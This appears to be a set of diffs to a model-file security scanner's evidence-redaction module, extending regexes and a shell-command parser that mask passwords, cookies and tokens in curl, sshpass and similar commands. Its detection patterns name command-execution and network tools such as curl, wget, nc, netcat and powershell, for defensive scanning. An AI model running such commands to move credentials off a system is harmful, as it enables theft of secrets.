+        return f"{match.group('option')}{argument[: colon_index + 1]}{REDACTED_EVIDENCE_VALUE}{closing_quote}"
     return f"{match.group('option')}{argument[: colon_index + 1]}{_redact_positional_secret_value(password)}"
 
 
@@ -3226,16 +3365,19 @@ def _is_stdin_auth_subprocess_command(raw_argument: str) -> bool:
 
 
 def _curl_config_arguments_use_stdin(arguments: list[str]) -> bool:
+    stdin_sources = {"-", "/dev/stdin", "/dev/fd/0", "/proc/self/fd/0"}
     for index, argument in enumerate(arguments):
-        if argument.casefold() == "--config=-":
+        option, separator, source = argument.partition("=")
+        if separator and option.casefold() in {"--config", "--netrc-file"} and source in stdin_sources:
             return True
-        if argument.casefold() == "--netrc-file=-":
+        if (
+            argument.casefold() in {"--config", "--netrc-file"}
+            and index + 1 < len(arguments)
+            and arguments[index + 1] in stdin_sources
+        ):
             return True
-        if argument.casefold() == "--config" and index + 1 < len(arguments) and arguments[index + 1] == "-":
-            return True
-        if argument.casefold() == "--netrc-file" and index + 1 < len(arguments) and arguments[index + 1] == "-":
-            return True
-        if re.fullmatch(rf"{CURL_CONFIG_SHORT_OPTION_PATTERN}-", argument) is not None:
+        short_option = re.match(rf"(?i)^(?P<option>{CURL_CONFIG_SHORT_OPTION_PATTERN})(?P<source>.*)$", argument)
+        if short_option is not None and short_option.group("source") in stdin_sources:
             return True
         if (
             re.fullmatch(CURL_CONFIG_SHORT_OPTION_PATTERN, argument) is not None
@@ -3801,7 +3943,7 @@ def _redact_command_string_literals(text: str) -> str:
 
 
 def _redact_command_evidence_text(text: str) -> str:
-    if _curl_candidate_limit_exceeded(text):
+    if _curl_candidate_limit_exceeded(text) or _subprocess_candidate_limit_exceeded(text):
         return REDACTED_EVIDENCE_VALUE
     redacted = _redact_inline_curl_config_passwords(text)
     redacted = _redact_inline_password_sources(redacted)
@@ -3878,18 +4020,25 @@ def redact_evidence_string(text: str, max_chars: int = 180) -> str:
     redaction_budget = max(0, max_chars) + EVIDENCE_REDACTION_LOOKAHEAD_CHARS
     url_budget = max(0, max_chars) + EVIDENCE_URL_LOOKAHEAD_CHARS
     redacted = text[:url_budget]
+    if _curl_candidate_limit_exceeded(redacted) or _subprocess_candidate_limit_exceeded(redacted):
+        return _truncate(REDACTED_EVIDENCE_VALUE, max_chars)
     redacted = _redact_adjacent_command_literal_groups(redacted)
     redacted = _normalize_serialized_url_slashes(redacted)
-    redacted = URL_RE.sub(_redact_url, redacted)
+    if "://" in redacted:
+        redacted = URL_RE.sub(_redact_url, redacted)
     redacted = redacted[:redaction_budget]
-    if _curl_candidate_limit_exceeded(redacted):
+    if _curl_candidate_limit_exceeded(redacted) or _subprocess_candidate_limit_exceeded(redacted):
         return _truncate(REDACTED_EVIDENCE_VALUE, max_chars)
     redacted = _normalize_serialized_assignment_separators(redacted)
     redacted = _normalize_serialized_quote_escapes(redacted)
     redacted = _normalize_embedded_control_sensitive_keys(redacted)
     redacted = _normalize_serialized_structured_sensitive_keys(redacted)
-    redacted = STRUCTURED_QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_structured_quoted_assignment, redacted)
+    folded = redacted.casefold()
+    has_sensitive_key_signal = any(signal in folded for signal in SENSITIVE_KEYWORD_SIGNALS)
+    if has_sensitive_key_signal and ("=" in redacted or ":" in redacted) and ('"' in redacted or "'" in redacted):
+        redacted = STRUCTURED_QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_structured_quoted_assignment, redacted)
     redacted = _redact_inline_curl_config_passwords(redacted)
+    redacted = _redact_inline_curl_cookie_sources(redacted)
     redacted = _redact_inline_password_sources(redacted)
     redacted = _redact_curl_credentials(redacted)
     redacted = _redact_command_context_tokens(redacted)
@@ -3902,21 +4051,36 @@ def redact_evidence_string(text: str, max_chars: int = 180) -> str:
     redacted = _normalize_subscript_sensitive_keys(redacted)
     redacted = _normalize_unquoted_sensitive_keys(redacted)
     redacted = _redact_sensitive_literal_expressions(redacted)
-    redacted = TRIPLE_QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_prefixed_quoted_value, redacted)
-    redacted = TRIPLE_QUOTED_AUTHORIZATION_VALUE_RE.sub(_redact_prefixed_quoted_value, redacted)
-    redacted = TRIPLE_QUOTED_BEARER_VALUE_RE.sub(_redact_prefixed_quoted_value, redacted)
+    folded = redacted.casefold()
+    has_quotes = '"' in redacted or "'" in redacted
+    has_assignment_separator = "=" in redacted or ":" in redacted
+    has_sensitive_key_signal = any(signal in folded for signal in SENSITIVE_KEYWORD_SIGNALS)
+    has_authorization_signal = "auth" in folded
+    has_bearer_signal = "bearer" in folded
+    if has_quotes and has_assignment_separator and has_sensitive_key_signal:
+        redacted = TRIPLE_QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_prefixed_quoted_value, redacted)
+    if has_quotes and has_assignment_separator and has_authorization_signal:
+        redacted = TRIPLE_QUOTED_AUTHORIZATION_VALUE_RE.sub(_redact_prefixed_quoted_value, redacted)
+    if has_quotes and has_bearer_signal:
+        redacted = TRIPLE_QUOTED_BEARER_VALUE_RE.sub(_redact_prefixed_quoted_value, redacted)
     redacted = _redact_unclosed_quoted_values(redacted)
-    redacted = QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_quoted_assignment, redacted)
-    redacted = QUOTED_AUTHORIZATION_VALUE_RE.sub(_redact_quoted_authorization, redacted)
-    redacted = QUOTED_BEARER_VALUE_RE.sub(_redact_quoted_authorization, redacted)
+    if has_quotes and has_assignment_separator and has_sensitive_key_signal:
+        redacted = QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_quoted_assignment, redacted)
+    if has_quotes and has_assignment_separator and has_authorization_signal:
+        redacted = QUOTED_AUTHORIZATION_VALUE_RE.sub(_redact_quoted_authorization, redacted)
+    if has_quotes and has_bearer_signal:
+        redacted = QUOTED_BEARER_VALUE_RE.sub(_redact_quoted_authorization, redacted)
     redacted = _redact_adjacent_string_literals(redacted)
     redacted = _redact_residual_expression_literals(redacted)
-    redacted = COMPOUND_AUTHORIZATION_VALUE_RE.sub(_redact_authorization_value, redacted)
-    redacted = AUTHORIZATION_VALUE_RE.sub(_redact_authorization_value, redacted)
-    redacted = UNKNOWN_AUTHORIZATION_SCHEME_VALUE_RE.sub(_redact_unknown_authorization_scheme_value, redacted)
-    redacted = BARE_AUTHORIZATION_VALUE_RE.sub(_redact_bare_authorization_value, redacted)
-    redacted = BEARER_VALUE_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
-    redacted = SENSITIVE_ASSIGNMENT_RE.sub(_redact_unquoted_sensitive_assignment, redacted)
+    if has_assignment_separator and has_authorization_signal:
+        redacted = COMPOUND_AUTHORIZATION_VALUE_RE.sub(_redact_authorization_value, redacted)
+        redacted = AUTHORIZATION_VALUE_RE.sub(_redact_authorization_value, redacted)
+        redacted = UNKNOWN_AUTHORIZATION_SCHEME_VALUE_RE.sub(_redact_unknown_authorization_scheme_value, redacted)
+        redacted = BARE_AUTHORIZATION_VALUE_RE.sub(_redact_bare_authorization_value, redacted)
+    if has_bearer_signal:
+        redacted = BEARER_VALUE_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
+    if has_assignment_separator and has_sensitive_key_signal:
+        redacted = SENSITIVE_ASSIGNMENT_RE.sub(_redact_unquoted_sensitive_assignment, redacted)
     redacted = NPMRC_SCOPED_AUTH_ASSIGNMENT_RE.sub(_redact_command_positional_secret, redacted)
     redacted = NPM_CONFIG_SCOPED_AUTH_ARGUMENT_RE.sub(_redact_command_positional_secret, redacted)
     redacted = _redact_shared_provider_tokens(redacted)

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -263,14 +263,18 @@ CURL_ATTACHED_COOKIE_SERIALIZED_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     r"(?<!\\)(?P=slashes)(?P=quote)"
 )
 COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!(?P=quote)).)"
+COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)(?!(?P=quote)).)"
 COMMAND_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
-    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*:)"
-    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>(?:[A-Za-z]:[\\/])?"
+    rf"{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
+COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)[^\s\"';&|)])"
 COMMAND_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
-    r"(?P<certificate>[^\s\"';&|)]*:)(?P<password>[^\s\"';&|)]+)"
+    rf"(?P<certificate>(?:[A-Za-z]:[\\/])?{COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*:)"
+    r"(?P<password>[^\s\"';&|)]+)"
 )
 COMMAND_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)((?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)(\$?[\"']?)([^:\s\"';&|]*:)"
@@ -278,7 +282,7 @@ COMMAND_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
-    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*?:)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
 )
 COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
@@ -287,7 +291,7 @@ COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
-    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*?:)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
 )
 COMMAND_CONFIG_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
@@ -2637,7 +2641,7 @@ def _redact_quoted_certificate_password(match: re.Match[str]) -> str:
         return match.group(0)
     return (
         f"{match.group('option')}{match.group('prefix')}{match.group('quote')}"
-        f"{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}{match.group('quote')}"
+        f"{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}{match.group('closing')}"
     )
 
 

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -5,6 +5,7 @@ from __future__ import annotations
 import ast
 import io
 import re
+import shlex
 import string
 import tokenize
 import unicodedata
@@ -195,14 +196,16 @@ SENSITIVE_EVIDENCE_PREFIX_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?i)\b(({SENSITIVE_ASSIGNMENT_KEY})\s*{ASSIGNMENT_SEPARATOR}\s*|"
     rf"\b{AUTHORIZATION_KEY_PATTERN}\s*{ASSIGNMENT_SEPARATOR}\s*{AUTHORIZATION_SCHEME_PATTERN}|\bbearer\s+)"
 )
+CURL_EXECUTABLE_NAME_PATTERN: Final[str] = r"curl(?:\.exe)?"
 COMMAND_EVIDENCE_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)\b(?:(?:os\.system|subprocess\.(?:popen|run|call|check_output|check_call)|eval|exec|__import__)\s*\(|"
     r"(?:bash|sh)\s+-c\b|cmd\.exe\s*/c\b|powershell(?:\.exe)?\b|"
-    r"(?:curl|wget|nc|netcat|sshpass|redis-cli)(?=\s|$))"
+    rf"(?:{CURL_EXECUTABLE_NAME_PATTERN}|wget|nc|netcat|sshpass|redis-cli)(?=\s|$))"
     r"|(?:docker\s+login|aws\s+configure\s+set|az\s+(?:login|storage)|openssl\s+enc|poetry\s+config)\b"
 )
 COMMAND_CONTEXT_LITERAL_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?i)(?:os\.system|subprocess|__import__|bash\s+-c|sh\s+-c|cmd\.exe|powershell|curl|wget|nc\s+|netcat|"
+    rf"(?i)(?:os\.system|subprocess|__import__|bash\s+-c|sh\s+-c|cmd\.exe|powershell|"
+    rf"{CURL_EXECUTABLE_NAME_PATTERN}|wget|nc\s+|netcat|"
     r"sshpass|redis-cli|docker\s+login|aws\s+configure\s+set|az\s+(?:login|storage)|openssl\s+enc|"
     r"poetry\s+config|\b(?:cat|id|touch)\b|/[A-Za-z0-9_./-]+)"
 )
@@ -231,11 +234,12 @@ COMMAND_SECRET_OPTION_RE: Final[re.Pattern[str]] = re.compile(
     r"(?!<\()(?:\$?\"(?:\\.|[^\"\\])*\"|\$?'(?:\\.|[^'\\])*'|[^\s\"';&|)]+)"
 )
 CURL_COMMAND_TRANSITION_PATTERN: Final[str] = (
-    r"(?<![-/\w.])(?:bash|sh|cmd\.exe|powershell(?:\.exe)?|wget|nc|netcat|sshpass|redis-cli|docker|aws|curl)"
+    rf"(?<![-/\w.])(?:bash|sh|cmd\.exe|powershell(?:\.exe)?|wget|nc|netcat|sshpass|redis-cli|docker|aws|"
+    rf"{CURL_EXECUTABLE_NAME_PATTERN})"
     r"(?=\s+-)"
 )
 CURL_ATTACHED_COOKIE_OPTION_PREFIX_PATTERN: Final[str] = (
-    rf"\bcurl\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
+    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
     r"(?<=[\s\"'])-[A-Za-z]*?b"
 )
 CURL_ATTACHED_COOKIE_OPTION_RE: Final[re.Pattern[str]] = re.compile(
@@ -264,12 +268,17 @@ CURL_ATTACHED_COOKIE_SERIALIZED_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN: Final[str] = r"(?:\\.|\\\Z|(?!\\)(?!(?P=quote)).)"
 COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)(?!(?P=quote)).)"
+COMMAND_UNQUOTED_CREDENTIAL_PASSWORD_PATTERN: Final[str] = r"(?:\\[\s\S]|(?!\\)[^\s\"';&|)])+"
 COMMAND_CERT_OPTION_BOUNDARY_PATTERN: Final[str] = r"(?<![^\s\"'])"
 COMMAND_CERT_OPTION_ESCAPE_PATTERN: Final[str] = r"(?:\\)?"
+CURL_CERT_BUNDLE_FLAG_PATTERN: Final[str] = r"[#012346:BGIJLMNORSVZafgijklnpqsv]*"
+CURL_CONFIG_SHORT_OPTION_PATTERN: Final[str] = rf"-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}K)"
+CURL_USER_SHORT_OPTION_PATTERN: Final[str] = rf"-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}u)"
+COMMAND_USER_OPTION_PATTERN: Final[str] = rf"(?:(?<!\w)--(?:user|proxy-user)|(?<!\w){CURL_USER_SHORT_OPTION_PATTERN})"
 COMMAND_CERT_OPTION_PATTERN: Final[str] = (
     rf"(?:{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
     rf"--(?:proxy-)?cert(?:=|\s+)|{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
-    rf"-(?-i:[A-DF-Za-z0-9#:]*E)(?:=|\s*))"
+    rf"-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}E)(?:=|\s*))"
 )
 COMMAND_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
@@ -280,34 +289,47 @@ COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\[^:\r\n]|(?!
 COMMAND_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?i)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
     rf"(?P<certificate>{COMMAND_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*(?:\\)?:)"
-    r"(?P<password>[^\s\"';&|)]+)"
+    rf"(?P<password>{COMMAND_UNQUOTED_CREDENTIAL_PASSWORD_PATTERN})"
 )
 COMMAND_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?i)((?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)(\$?[\"']?)([^:\s\"';&|]*:)"
-    r"([^\"'\s;&|)]+)([\"']?)"
+    rf"(?i)((?:{COMMAND_USER_OPTION_PATTERN})(?:=|\s+)?)(\$?[\"']?)([^:\s\"';&|]*:)"
+    rf"({COMMAND_UNQUOTED_CREDENTIAL_PASSWORD_PATTERN})([\"']?)"
 )
 COMMAND_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
+    rf"(?is)(?P<option>(?:{COMMAND_USER_OPTION_PATTERN})(?:=|\s+)?)"
     rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
-    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
 COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
+    rf"(?is)(?P<option>(?:{COMMAND_USER_OPTION_PATTERN})(?:=|\s+)?)"
     r"(?P<username>[^:\s\"';&|]*:)(?P<password>\$\((?:\\.|[^\\)])*\))"
 )
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
     rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
-    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
 COMMAND_CONFIG_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)(?<![?&/\w-])((?:proxy-)?user\s*(?:=|:|\s+)\s*)(\$?[\"']?)([^:\s\"';&|]*:)"
     r"([^\"'\r\n]+)([\"']?)"
 )
 CURL_INLINE_CONFIG_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)\bcurl\b(?:(?![;\n]).){0,2048}?"
-    r"(?P<option>(?<!\w)(?:(?P<config>--config|-K)|(?P<netrc>--netrc-file))(?:=|\s+))"
+    rf"(?is)\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]).){{0,2048}}?"
+    rf"(?P<option>(?<!\w)(?:(?P<config>--config)(?:=|\s+)|"
+    rf"(?P<short_config>{CURL_CONFIG_SHORT_OPTION_PATTERN})\s*|"
+    r"(?P<netrc>--netrc-file)(?:=|\s+)))"
     r"(?P<source><\(|-)"
+)
+COMMAND_CONFIG_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
+    r"(?is)(?P<option>(?<![?&/\w-])(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
+)
+COMMAND_CONFIG_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)[^\s\"';&|)])"
+COMMAND_CONFIG_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
+    r"(?i)(?P<option>(?<![?&/\w-])(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
+    rf"(?P<certificate>{COMMAND_CONFIG_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*:)"
+    rf"(?P<password>{COMMAND_UNQUOTED_CREDENTIAL_PASSWORD_PATTERN})"
 )
 COMMAND_NETRC_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![\w-])(?P<prefix>password\s+)"
@@ -380,7 +402,7 @@ SSHPASS_FILE_DESCRIPTOR_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_INLINE_SECRET_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?:(?<!\w){COMMAND_SECRET_LONG_OPTION_PATTERN}(?:=|\s+)|"
-    rf"\bcurl\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
+    rf"\b{CURL_EXECUTABLE_NAME_PATTERN}\b(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,2048}}?"
     r"(?<!\w)-[A-Za-z]*b(?![A-Za-z])(?:=|\s+))\s*<\("
 )
 SHELL_HERE_STRING_VALUE_RE: Final[re.Pattern[str]] = re.compile(
@@ -437,7 +459,11 @@ SENSITIVE_ARGV_PAIR_RE: Final[re.Pattern[str]] = re.compile(
 )
 CURL_SHORT_COOKIE_OPTION_RE: Final[re.Pattern[str]] = re.compile(r"(?i)^-[a-z]*b$")
 PYTHON_CURL_ARGV_START_RE: Final[re.Pattern[str]] = re.compile(
-    rf"(?is)^\s*(?:{PYTHON_STRING_PREFIX_RE})?(?P<quote>[\"'])curl(?P=quote)(?:\s*,|\s*$)"
+    rf"(?is)^\s*(?:{PYTHON_STRING_PREFIX_RE})?(?P<quote>[\"'])"
+    rf"(?:[^\"']*[\\/])?{CURL_EXECUTABLE_NAME_PATTERN}(?P=quote)(?:\s*,|\s*$)"
+)
+CURL_EXECUTABLE_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?i)(?<![-\w.])(?P<executable>{CURL_EXECUTABLE_NAME_PATTERN})(?=$|[\s\"',)\]])"
 )
 SERIALIZED_STRUCTURED_QUOTED_KEY_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<prefix>(?:^|[{{,])\s*)(?P<slashes>\\+)(?P<quote>[\"'])"
@@ -2383,7 +2409,7 @@ def _redact_command_user_password(match: re.Match[str]) -> str:
 def _redact_quoted_command_user_password(match: re.Match[str]) -> str:
     return (
         f"{match.group('option')}{match.group('prefix')}{match.group('quote')}"
-        f"{match.group('username')}{REDACTED_EVIDENCE_VALUE}{match.group('quote')}"
+        f"{match.group('username')}{REDACTED_EVIDENCE_VALUE}{match.group('closing')}"
     )
 
 
@@ -2428,9 +2454,9 @@ def _find_shell_group_end(text: str, start: int) -> int:
             continue
         if char in {"'", '"'}:
             quote = char
-        elif char == "(":
+        elif char == "(" and _count_preceding_backslashes(text, index) % 2 == 0:
             depth += 1
-        elif char == ")":
+        elif char == ")" and _count_preceding_backslashes(text, index) % 2 == 0:
             depth -= 1
             if depth == 0:
                 return index
@@ -2438,11 +2464,38 @@ def _find_shell_group_end(text: str, start: int) -> int:
     return len(text)
 
 
+def _search_unquoted_shell_pattern(
+    pattern: re.Pattern[str],
+    text: str,
+    start: int,
+    end: int,
+) -> re.Match[str] | None:
+    quote: str | None = None
+    index = start
+    while index < end:
+        char = text[index]
+        if quote is not None:
+            if char == quote and _count_preceding_backslashes(text, index) % 2 == 0:
+                quote = None
+            index += 1
+            continue
+        if char in {"'", '"'}:
+            quote = char
+        elif char == "\\":
+            index += 1
+        else:
+            match = pattern.match(text, index, end)
+            if match is not None:
+                return match
+        index += 1
+    return None
+
+
 def _find_shell_heredoc_body_range(text: str, start: int) -> tuple[int, int] | None:
     line_end = text.find("\n", start)
     if line_end < 0:
         return None
-    operator = SHELL_HEREDOC_OPERATOR_RE.search(text, start, line_end)
+    operator = _search_unquoted_shell_pattern(SHELL_HEREDOC_OPERATOR_RE, text, start, line_end)
     if operator is None:
         return None
 
@@ -2610,22 +2663,292 @@ def _redact_inline_command_secret_sources(text: str) -> str:
     return text
 
 
+def _curl_executable_token_start(text: str, curl_name_start: int) -> int | None:
+    token_start = curl_name_start
+    while token_start > 0 and text[token_start - 1] not in " \t\r\n\"';&|(),[]{}":
+        token_start -= 1
+    candidate = text[token_start:curl_name_start]
+    if "://" in candidate or candidate.startswith("//") or re.match(r"[A-Za-z_][A-Za-z0-9_]*=", candidate) is not None:
+        return None
+    return token_start if candidate.endswith(("/", "\\")) else curl_name_start
+
+
+def _shell_segment_context(text: str, end: int) -> tuple[int, str | None, int]:
+    window_start = max(0, end - 2048)
+    segment_start = window_start
+    quote: str | None = None
+    quote_start = -1
+    index = window_start
+    while index < end:
+        char = text[index]
+        if quote is not None:
+            if char == quote and _count_preceding_backslashes(text, index) % 2 == 0:
+                quote = None
+                quote_start = -1
+            index += 1
+            continue
+        if char in {"'", '"', "`"}:
+            quote = char
+            quote_start = index
+        elif char == "\\":
+            index += 1
+        elif char in {";", "&", "|", "\n"}:
+            segment_start = index + 1
+        index += 1
+    return segment_start, quote, quote_start
+
+
+def _shell_wrapper_prefix_allows_command(prefix: str) -> bool:
+    try:
+        tokens = shlex.split(prefix)
+    except ValueError:
+        return False
+
+    index = 0
+    while index < len(tokens) and tokens[index] in {"!", "do", "elif", "if", "then", "until", "while"}:
+        index += 1
+    while index < len(tokens) and re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", tokens[index], re.DOTALL):
+        index += 1
+    while index < len(tokens):
+        wrapper = tokens[index]
+        index += 1
+        if wrapper == "env":
+            options_with_values = {"-C", "-S", "-u", "--chdir", "--split-string", "--unset"}
+            while index < len(tokens):
+                token = tokens[index]
+                if token == "--":
+                    index += 1
+                    break
+                if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", token, re.DOTALL):
+                    index += 1
+                    continue
+                if not token.startswith("-"):
+                    break
+                option = token.split("=", 1)[0]
+                index += 1
+                if option in options_with_values and "=" not in token:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
+        if wrapper == "sudo":
+            options_with_values = {
+                "-C",
+                "-g",
+                "-h",
+                "-p",
+                "-r",
+                "-t",
+                "-T",
+                "-u",
+                "--chdir",
+                "--group",
+                "--host",
+                "--prompt",
+                "--role",
+                "--type",
+                "--user",
+            }
+            while index < len(tokens) and tokens[index].startswith("-"):
+                option = tokens[index].split("=", 1)[0]
+                index += 1
+                if option in options_with_values and "=" not in tokens[index - 1]:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
+        if wrapper in {"command", "nohup"}:
+            while index < len(tokens) and tokens[index].startswith("-"):
+                index += 1
+            continue
+        if wrapper in {"exec", "time"}:
+            options_with_values = {"-a"} if wrapper == "exec" else {"-f", "-o", "--format", "--output"}
+            while index < len(tokens) and tokens[index].startswith("-"):
+                option = tokens[index].split("=", 1)[0]
+                index += 1
+                if option in options_with_values and "=" not in tokens[index - 1]:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
+        if wrapper == "nice":
+            while index < len(tokens) and tokens[index].startswith("-"):
+                option = tokens[index]
+                index += 1
+                if option in {"-n", "--adjustment"} and "=" not in option:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
+        if wrapper == "xargs":
+            while index < len(tokens) and tokens[index].startswith("-"):
+                option = tokens[index]
+                index += 1
+                if option in {"-a", "-d", "-E", "-I", "-L", "-n", "-P", "-s"}:
+                    if index >= len(tokens):
+                        return False
+                    index += 1
+            continue
+        return False
+    return True
+
+
